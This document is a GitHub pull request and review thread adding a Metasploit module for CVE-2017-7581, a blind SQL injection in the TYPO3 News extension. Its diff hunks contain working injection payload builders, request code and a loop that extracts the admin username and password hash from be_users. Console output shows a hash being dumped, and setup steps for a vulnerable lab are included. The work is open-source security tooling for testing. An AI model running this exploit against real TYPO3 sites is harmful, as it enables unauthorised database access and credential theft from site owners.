### PR TITLE
Typo3 News Module Sql Injection exploit

### LINKED ISSUE #8213: Module request: CVE-2017-7581
SQL injection vulnerability in NewsController.php in the News module 5.3.2 and earlier for TYPO3 allows unauthenticated users to execute arbitrary SQL commands via vectors involving overwriteDemand for order and OrderByAllowed. Since this TYPO3 module is quite popular it might be useful to have a Metasploit module for this vulnerability.
Details and PoC exploit: [https://www.ambionics.io/blog/typo3-news-module-sqli](https://www.ambionics.io/blog/typo3-news-module-sqli)

### PR DESCRIPTION
**Pull request by Mzack9999**
Issue Number: resolves #8213 

This auxiliary module exploits a sqli vulnerability of Typo 3 news module
Link: https://www.ambionics.io/blog/typo3-news-module-sqli

## Vulnerable Environment Creation

Install the vulnerable software, it can be done rapidly as follows:

- [ ] `git clone https://github.com/Tuurlijk/TYPOTry`
- [ ] `Vagrant up`
- [ ] `Vagrant ssh`
- [ ] `cd /var/www/6.2.30.local.typo3.org`
- [ ] `composer require georgringer/news:3.2.6`
- [ ] Login to the web interface as admin:supersecret at http://6.2.30.local.typo3.org/typo3/
- [ ] Enable news plugin if not already enabled
- [ ] Import attached vulnerable page [T3D__2017-05-20_02-17-z.t3d.zip](https://github.com/rapid7/metasploit-framework/files/1015777/T3D__2017-05-20_02-17-z.t3d.zip)
- [ ] Enable page if not already enabled (name should be nlist)
- [ ] Check if page is visible to not authenticated user at http://6.2.30.local.typo3.org/index.php?id=40 (change the id according to your local instance)

## Verification

Example output
```bash
marco@kali:~/.msf4/modules/auxiliary/admin/http$ msfconsole -qx "use auxiliary/admin/http/typo3_news_module_sqli; set RHOST 192.168.144.120; set VHOST 6.2.30.local.typo3.org; set TARGETURI /; set ID 40; exploit; exit;"
RHOST => 192.168.144.120
VHOST => 6.2.30.local.typo3.org
TARGETURI => /
ID => 40
[*] Trying to automatically determine Pattern1 and Pattern2...
[*] Pattern1: Article #1
[*] Pattern2: Article #2
[*] Dumping the username and password hash...
[+] Username: admin
[+] Password Hash: $P$CjZzlLXeuoh/DZ2Agu83KljpKZUAYV1
[*] Auxiliary module execution completed
marco@kali:~/.msf4/modules/auxiliary/admin/http$ 
```

### CODE REVIEW

File: modules/auxiliary/admin/http/typo3_news_module_sqli.rb [hunk 1]
```diff
@@ -0,0 +1,141 @@
...
+    ascii_charset_lower = "a".upto("z").to_a.join('')
+    ascii_charset_upper = "A".upto("Z").to_a.join('')
+    ascii_charset = "#{ascii_charset_lower}#{ascii_charset_upper}"
+    digit_charset = "0".upto("9").to_a.join('')
+
+    full_charset = "#{ascii_charset_lower}#{ascii_charset_upper}#{digit_charset}$./"
+    username = blind('username','be_users', 'uid=1', ascii_charset, digit_charset)
+    print_good("Username: #{username}")
+    password = blind('password','be_users', 'uid=1', full_charset, digit_charset)
+    print_good("Username: #{password}")
```
Comment (bcoles) [inline modules/auxiliary/admin/http/typo3_news_module_sqli.rb]: "Password Hash"  ?

Comment (Mzack9999) [inline modules/auxiliary/admin/http/typo3_news_module_sqli.rb]: Fixed. Thanks!

File: modules/auxiliary/admin/http/typo3_news_module_sqli.rb [hunk 2]
```diff
@@ -0,0 +1,141 @@
...
+          'Charles Fol', # initial discovery, POC
+          'Marco Rivoli <marco.rivoli.nvh<at>gmail.com>' #MSF code
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2017-7581'  ],
+          [ 'URL', 'http://www.ambionics.io/blog/typo3-news-module-sqli' ], # Advisory
+        ],
+      'Privileged'     => false,
+      'Payload'        =>
```
Comment (bcoles) [inline modules/auxiliary/admin/http/typo3_news_module_sqli.rb]: The 'Payload' module options can be safely removed for an auxiliary module.

File: modules/auxiliary/admin/http/typo3_news_module_sqli.rb [hunk 3]
```diff
@@ -0,0 +1,141 @@
...
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path,'index.php'),
+      'vars_get' => {
+        'id' => datastore['ID'],
+        'no_cache' => '1'
+       },
+       'vars_post' => {
+         'tx_news_pi1[overwriteDemand][OrderByAllowed]' => payload,
+         'tx_news_pi1[search][maximumDate]' => '2017-12-31',
```
Comment (bcoles) [inline modules/auxiliary/admin/http/typo3_news_module_sqli.rb]: Can `maximumDate` and `minimumDate` be randomised?

File: modules/auxiliary/admin/http/typo3_news_module_sqli.rb [hunk 4]
```diff
@@ -0,0 +1,141 @@
...
+    username = blind('username','be_users', 'uid=1', ascii_charset, digit_charset)
+    print_good("Username: #{username}")
+    password = blind('password','be_users', 'uid=1', full_charset, digit_charset)
+    print_good("Password Hash: #{password}")
+    return [username, password]
+  end
+
+  def blind(field, table, condition, charset, digit_charset)
+    size = blind_size(
+     "length(#{field})+9",
```
Comment (bcoles) [inline modules/auxiliary/admin/http/typo3_news_module_sqli.rb]: Why is `9` used?

Looking at the comments in the original exploit: `We add 9 so that the result has two digits, If the length is superior to 100-9 it won't work`. Consider documenting this here.

Also, consider setting a variable `offset = 9`; then:

* replacing `"length(#{field})+9"` with `"length(#{field})+#{offset}"` here; and
* replacing `size = size.to_i - 9` with `size = size.to_i - offset` below.

File: modules/auxiliary/admin/http/typo3_news_module_sqli.rb [hunk 5]
```diff
@@ -0,0 +1,141 @@
...
+      'Targets'        => [[ 'Automatic', { }]],
+      'DisclosureDate' => 'Apr 6 2017',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The path of TYPO3', '/typo3/']),
+        OptString.new('ID', [true, 'The id of TYPO3 news page', '1']),
+        OptString.new('PATTERN1', [true, 'Pattern of the first article', 'Article #1']),
+        OptString.new('PATTERN2', [true, 'Pattern of the first article', 'Article #2'])
```
Comment (bcoles) [inline modules/auxiliary/admin/http/typo3_news_module_sqli.rb]: "second article"  ?

File: modules/auxiliary/admin/http/typo3_news_module_sqli.rb [hunk 6]
```diff
@@ -0,0 +1,141 @@
...
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [[ 'Automatic', { }]],
+      'DisclosureDate' => 'Apr 6 2017',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The path of TYPO3', '/typo3/']),
+        OptString.new('ID', [true, 'The id of TYPO3 news page', '1']),
+        OptString.new('PATTERN1', [true, 'Pattern of the first article', 'Article #1']),
```
Comment (bcoles) [inline modules/auxiliary/admin/http/typo3_news_module_sqli.rb]: It's not clear what exactly these `PATTERN` options are for without reading the advisory. Why are the article IDs needed? Where does the user find them? It would be nice if this was documented in the module description or in the module documentation.

Is there a reliable method to extract valid patterns from the application, without having the user set them? The module could then fall back to user specified `PATTERN` module options if the auto-detection fails.

File: modules/auxiliary/admin/http/typo3_news_module_sqli.rb (hunk 2 above)
Comment (Mzack9999) [inline modules/auxiliary/admin/http/typo3_news_module_sqli.rb]: 'Payload' module has been removed

File: modules/auxiliary/admin/http/typo3_news_module_sqli.rb (hunk 5 above)
Comment (Mzack9999) [inline modules/auxiliary/admin/http/typo3_news_module_sqli.rb]: Fixed

File: modules/auxiliary/admin/http/typo3_news_module_sqli.rb (hunk 4 above)
Comment (Mzack9999) [inline modules/auxiliary/admin/http/typo3_news_module_sqli.rb]: Added variable offset and comment in the code

File: modules/auxiliary/admin/http/typo3_news_module_sqli.rb (hunk 3 above)
Comment (Mzack9999) [inline modules/auxiliary/admin/http/typo3_news_module_sqli.rb]: After some tests with BurpSuite, it turned out that they not even required

File: modules/auxiliary/admin/http/typo3_news_module_sqli.rb (hunk 6 above)
Comment (Mzack9999) [inline modules/auxiliary/admin/http/typo3_news_module_sqli.rb]: Auto-detection, with fall back to user defined values implemented

File: modules/auxiliary/admin/http/typo3_news_module_sqli.rb [hunk 7]
```diff
@@ -0,0 +1,176 @@
...
+        OptString.new('TARGETURI', [true, 'The path of TYPO3', '/typo3/']),
+        OptString.new('ID', [true, 'The id of TYPO3 news page', '1']),
+        OptString.new('PATTERN1', [false, 'Pattern of the first article title', 'Article #1']),
+        OptString.new('PATTERN2', [false, 'Pattern of the second article title', 'Article #2'])
+      ])
+  end
+
+  def check
+    # the only way to test if the target is vuln
+    if test_injection
```
Comment (bcoles) [inline modules/auxiliary/admin/http/typo3_news_module_sqli.rb]: Shouldn't this be `if test` ?

File: modules/auxiliary/admin/http/typo3_news_module_sqli.rb [hunk 8]
```diff
@@ -0,0 +1,176 @@
...
+    print_status("Trying to automatically determine Pattern1 and Pattern2...")
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path,'index.php'),
+      'vars_get' => {
+        'id' => datastore['ID'],
+        'no_cache' => '1'
+       }
+    })
+    news = res.get_html_document.search('div[@itemtype="http://schema.org/Article"]');
```
Comment (bcoles) [inline modules/auxiliary/admin/http/typo3_news_module_sqli.rb]: Consider warning the user and failing gracefully if no news items are identified on the page with the specified ID.

I get:

```
[*] Trying to automatically determine Pattern1 and Pattern2...
[-] Auxiliary failed: NoMethodError undefined method `search' for nil:NilClass
[-] Call stack:
[-]   /pentest/exploit/metasploit-framework/modules/auxiliary/admin/http/typo3_news_module_sqli.rb:152:in `try_autodetect_patterns'
[-]   /pentest/exploit/metasploit-framework/modules/auxiliary/admin/http/typo3_news_module_sqli.rb:168:in `run'
[*] Auxiliary module execution completed
```

**Comment by bcoles** [comment]
For those playing along at home, I got this working with news extension version 5.0.0 on the [Turnkey Linux Typo3 VM](https://www.turnkeylinux.org/typo3) which uses Typo3 version 7.6.4.

Install news extension:

```bash
cd /var/www/typo3
composer require georgringer/news:5.0.0
```

File: modules/auxiliary/admin/http/typo3_news_module_sqli.rb [hunk 9]
```diff
@@ -0,0 +1,176 @@
...
+      'Privileged'     => false,
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [[ 'Automatic', { }]],
+      'DisclosureDate' => 'Apr 6 2017',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The path of TYPO3', '/typo3/']),
```
Comment (bcoles) [inline modules/auxiliary/admin/http/typo3_news_module_sqli.rb]: Is this a safe/normal default? `/typo3/` points to the login page.

`set TARGETURI /` works.

If `/` is a safe default, the `TARGETURI` option can be removed from the module, as `/` is the default `TARGETURI` for all HTTP modules. Users can still configure the `TARGETURI` manually if they wish.

File: modules/auxiliary/admin/http/typo3_news_module_sqli.rb (hunk 7 above)
Comment (Mzack9999) [inline modules/auxiliary/admin/http/typo3_news_module_sqli.rb]: Fixed in latest commit

File: modules/auxiliary/admin/http/typo3_news_module_sqli.rb (hunk 8 above)
Comment (Mzack9999) [inline modules/auxiliary/admin/http/typo3_news_module_sqli.rb]: Warning added

File: modules/auxiliary/admin/http/typo3_news_module_sqli.rb [hunk 10]
```diff
@@ -0,0 +1,203 @@
...
+    if pattern1 != '' and pattern2 != ''
+      print_status("Pattern1: #{pattern1}")
+      print_status("Pattern2: #{pattern2}")
+    else
+      print_status("Couldn't determine Pattern1 and Pattern2 automatically, switching to user speficied values...")
+      pattern1 = datastore['PATTERN1']
+      pattern2 = datastore['PATTERN2']
+      print_status("Pattern1: #{pattern1}")
+      print_status("Pattern2: #{pattern2}")
+    end
```
Comment (bcoles) [inline modules/auxiliary/admin/http/typo3_news_module_sqli.rb]: DRY

```
    if pattern1.to_s.eql?('') || pattern2.to_s.eql?('')
      print_status("Couldn't determine Pattern1 and Pattern2 automatically, switching to user specified values...")
      pattern1 = datastore['PATTERN1']
      pattern2 = datastore['PATTERN2']
    end
    print_status("Pattern #1: #{pattern1}")
    print_status("Pattern #2: #{pattern2}")
```

File: modules/auxiliary/admin/http/typo3_news_module_sqli.rb [hunk 11]
```diff
@@ -0,0 +1,203 @@
...
+  end
+
+  def select_position(field, table, condition, position, char)
+    payload1 = "select(#{field})from(#{table})where(#{condition})"
+    payload2 = "ord(substring((#{payload1})from(#{position})for(1)))"
+    payload3 = "uid*(case((#{payload2})=#{char.ord})when(1)then(1)else(-1)end)"
+    return payload3
+  end
+
+  def blind_size(field, table, condition, size, charset,  patterns = {})
```
Comment (bcoles) [inline modules/auxiliary/admin/http/typo3_news_module_sqli.rb]: Consider adding a verbose output message here with the field name and length of the string so the user has some idea what to expect / how long it will take.

`    vprint_status("Retrieving field '#{field}' string (#{size} bytes) ...")`

Comment (Mzack9999) [inline modules/auxiliary/admin/http/typo3_news_module_sqli.rb]: verbose output added

File: modules/auxiliary/admin/http/typo3_news_module_sqli.rb [hunk 12]
```diff
@@ -0,0 +1,201 @@
...
+         'tx_news_pi1[search][maximumDate]' => '', # Not required
+         'tx_news_pi1[overwriteDemand][order]' => payload,
+         'tx_news_pi1[search][subject]' => '',
+         'tx_news_pi1[search][minimumDate]' => '' # Not required
+       }
+    })
+    return res.body.index(patterns[:pattern1]) < res.body.index(patterns[:pattern2])
+  end
+
+  def try_autodetect_patterns()
```
Comment (bcoles) [inline modules/auxiliary/admin/http/typo3_news_module_sqli.rb]: `()` are unnecessary for a method definition without parameters.

File: modules/auxiliary/admin/http/typo3_news_module_sqli.rb (hunk 8 above)
Comment (bcoles) [inline modules/auxiliary/admin/http/typo3_news_module_sqli.rb]: Also the `;` at the end of the line is redundant.

File: modules/auxiliary/admin/http/typo3_news_module_sqli.rb [hunk 13]
```diff
@@ -0,0 +1,201 @@
...
+    payload1 = "select(#{field})from(#{table})where(#{condition})"
+    payload2 = "ord(substring((#{payload1})from(#{position})for(1)))"
+    payload3 = "uid*(case((#{payload2})=#{char.ord})when(1)then(1)else(-1)end)"
+    return payload3
+  end
+
+  def blind_size(field, table, condition, size, charset,  patterns = {})
+    vprint_status("Retrieving field '#{field}' string (#{size} bytes) ...")
+    str = ""
+    for position in 0..size
```
Comment (bcoles) [inline modules/auxiliary/admin/http/typo3_news_module_sqli.rb]: This runs once more than necessary, and `each` is preferred over `for X in Y`.

You can use `(1..size).each do |position|` here, then replace `position + 1` with `position` below.

File: modules/auxiliary/admin/http/typo3_news_module_sqli.rb [hunk 14]
```diff
@@ -0,0 +1,201 @@
...
+        payload = select_position(field, table, condition, position + 1, char)
+        #print_status(payload)
+        if test(payload, patterns)
+          str += char.to_s
+          #print_status(str)
+          break
+        end
+      end
+    end
+    return str
```
Comment (bcoles) [inline modules/auxiliary/admin/http/typo3_news_module_sqli.rb]: Redundant `return`. You can use `str` instead of `return str`.

File: modules/auxiliary/admin/http/typo3_news_module_sqli.rb [hunk 15]
```diff
@@ -0,0 +1,201 @@
...
+     patterns
+    )
+    return data
+  end
+
+  def select_position(field, table, condition, position, char)
+    payload1 = "select(#{field})from(#{table})where(#{condition})"
+    payload2 = "ord(substring((#{payload1})from(#{position})for(1)))"
+    payload3 = "uid*(case((#{payload2})=#{char.ord})when(1)then(1)else(-1)end)"
+    return payload3
```
Comment (bcoles) [inline modules/auxiliary/admin/http/typo3_news_module_sqli.rb]: Redundant `return`. You can use `payload3` instead of `return payload3`.

File: modules/auxiliary/admin/http/typo3_news_module_sqli.rb [hunk 16]
```diff
@@ -0,0 +1,201 @@
...
+    size = size.to_i - offset
+    data = blind_size(
+     field,
+     table,
+     condition,
+     size,
+     charset,
+     patterns
+    )
+    return data
```
Comment (bcoles) [inline modules/auxiliary/admin/http/typo3_news_module_sqli.rb]: Redundant `return`. You can use `data` instead of `return data`.

File: modules/auxiliary/admin/http/typo3_news_module_sqli.rb [hunk 17]
```diff
@@ -0,0 +1,201 @@
...
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def test_injection()
+    pattern1, pattern2 = try_autodetect_patterns
+    if pattern1 == '' or pattern2 == ''
+      print_error("Impossible to determine pattern automatically, aborting...")
+      return false
+    else
```
Comment (bcoles) [inline modules/auxiliary/admin/http/typo3_news_module_sqli.rb]: The `if` statement will return if true, so you can move all of the code out of the `else` statement below.

File: modules/auxiliary/admin/http/typo3_news_module_sqli.rb [hunk 18]
```diff
@@ -0,0 +1,201 @@
...
+    payload2 = "ord(substring((#{payload1})from(#{position})for(1)))"
+    payload3 = "uid*(case((#{payload2})=#{char.ord})when(1)then(1)else(-1)end)"
+    return payload3
+  end
+
+  def blind_size(field, table, condition, size, charset,  patterns = {})
+    vprint_status("Retrieving field '#{field}' string (#{size} bytes) ...")
+    str = ""
+    for position in 0..size
+      for char in charset.split('')
```
Comment (bcoles) [inline modules/auxiliary/admin/http/typo3_news_module_sqli.rb]: `each` is preferred over `for X in Y`.

`charset.split('').each do |char|`

Comment (Mzack9999) [inline modules/auxiliary/admin/http/typo3_news_module_sqli.rb]: Changes implemented, thanks for the recommendations

**Comment by wchen-r7** [comment]
Thanks for the module @Mzack9999, also thanks for reviewing @bcoles. I'll be processing this PR.

**Comment by brandonprry** [comment]
Having trouble installing the typo3 module here.

This no longer works for me.

```
cd /var/www/typo3
composer require georgringer/news:5.0.0
```

I was able to download the vulnerable module from Exploit-DB: https://www.exploit-db.com/exploits/41940/

However, I am unable to successfully install it currently. Will update if I get it.

**Comment by brandonprry** [comment]
Also,

```
composer require georgringer/news:3.2.6
```

doesn't work for me as well.

**Comment by Mzack9999** [comment]
@brandonprry I just tried with [Turnkey Linux Typo3 VM](https://www.turnkeylinux.org/download?file=turnkey-typo3-14.1-jessie-amd64.ova) (Latest downloadable version), and once imported into virtual box I can correctly install the typo3 news module, here follows the output

```
root@typo3 ~# cd /var/www/typo3/
root@typo3 www/typo3# composer require georgringer/news:5.0.0
Running composer as root/super user is highly discouraged as packages, plugins and scripts cannot always be trusted
./composer.json has been updated
Loading composer repositories with package information
Updating dependencies (including require-dev)
  - Installing georgringer/news (5.0.0)
    Downloading: 100%         

georgringer/news suggests installing dmitryd/typo3-dd-googlesitemap (~2.0)
georgringer/news suggests installing reelworx/rx-shariff (~7.0)
Writing lock file
Generating autoload files
Inserting TYPO3_COMPOSER_MODE constant
root@typo3 www/typo3# 
```
Do you get any output error from composer?

**Comment by brandonprry** [comment]
Ok, using the turnkey image you used works to install the vulnerable version. However, I am unable to get the module working. I'm not sure I'm importing the page (t3d archive) you have provided correctly, but I'm not a TYPO3 expert by any means.

**Comment by Mzack9999** [comment]
This framework is really not intuitive at all, I will try to document with screenshots each step required:

My Typo3 VM Ip: 192.168.1.46
My Typo3 password: password

- Log into Typo3 with: admin:password at https://192.168.1.46/typo3/
- Activate the News plugin in Admin Tools->Extension->News system
image
- Import the vulnerable page in Web->Page->"Congratulations"->Contextual Menu->Branch actions->Import from .t3d
image
- in the upload tab select the provided .t3d file and click on upload file
image
- Back in the first tab, select the just uploaded file and scroll near the bottom and click import, and finally confirm
image
image
image
- Check that the page has been imported by selecting it (name should be nlist) and clicking on show
image
- You should see something like this (note the id of the page)
image
- Running the metasploit module you should get something like the following output
```
marco@kali:~$ msfconsole -qx "use auxiliary/admin/http/typo3_news_module_sqli; set RHOST 192.168.1.46; set TARGETURI /; set ID 38; exploit; exit;"
RHOST => 192.168.1.46
TARGETURI => /
ID => 38
[*] Trying to automatically determine Pattern1 and Pattern2...
[*] Pattern1: Article #1
[*] Pattern2: Article #2
[*] Dumping the username and password hash...
[+] Username: admin
....
```

File: modules/auxiliary/admin/http/typo3_news_module_sqli.rb [hunk 19]
```diff
@@ -0,0 +1,176 @@
...
+  def dump_the_hash(patterns = {})
+    ascii_charset_lower = "a".upto("z").to_a.join('')
+    ascii_charset_upper = "A".upto("Z").to_a.join('')
+    ascii_charset = "#{ascii_charset_lower}#{ascii_charset_upper}"
+    digit_charset = "0".upto("9").to_a.join('')
+    full_charset = "#{ascii_charset_lower}#{ascii_charset_upper}#{digit_charset}$./"
+    username = blind('username','be_users', 'uid=1', ascii_charset, digit_charset, patterns)
+    print_good("Username: #{username}")
+    password = blind('password','be_users', 'uid=1', full_charset, digit_charset, patterns)
+    print_good("Password Hash: #{password}")
```
Comment (jmartin-r7) [inline modules/auxiliary/admin/http/typo3_news_module_sqli.rb]: please report this as a credential

```
connection_details = {
            module_fullname: self.fullname,
            username: username,
            private_data: password,
            private_type: :nonreplayable_hash,
            status: Metasploit::Model::Login::Status::UNTRIED,
        }.merge(service_details)
create_credential(connection_details)
```

`service_details` is a provide method of HttpClient that provides meta data about the service communicated to by the module.

Comment (Mzack9999) [reply modules/auxiliary/admin/http/typo3_news_module_sqli.rb]: Now username and password are reported as credentials

**Comment by jrobles-r7** [comment]
# Release Notes

The modules/auxiliary/admin/http/typo3_news_module_sqli.rb module has been added to framework. The module performs blind SQL injection against vulnerable news extension modules to retrieve the username and password hash of a TYPO3 administrative user.
